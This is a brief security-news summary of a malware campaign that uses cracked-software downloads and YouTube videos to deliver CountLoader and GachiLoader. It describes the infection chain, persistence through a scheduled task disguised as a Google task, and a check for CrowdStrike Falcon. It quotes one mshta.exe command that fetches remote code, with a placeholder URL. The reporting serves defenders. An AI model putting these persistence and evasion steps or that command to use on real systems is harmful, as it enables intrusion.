Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Briefly

"The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader's ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025."

"The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter ("Setup.exe") that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using "mshta.exe.""

"To establish persistence, the malware creates a scheduled task that mimics Google by using the name "GoogleTaskSystem136.0.7023.12" along with an identifier-like string. It's configured to run every 30 minutes for 10 years by invoking "mshta.exe". It also checks if CrowdStrike's Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is tweaked to "cmd.exe /c start /b mshta.exe <URL>." Otherwise, it directly reaches out to the URL using "mshta.exe.""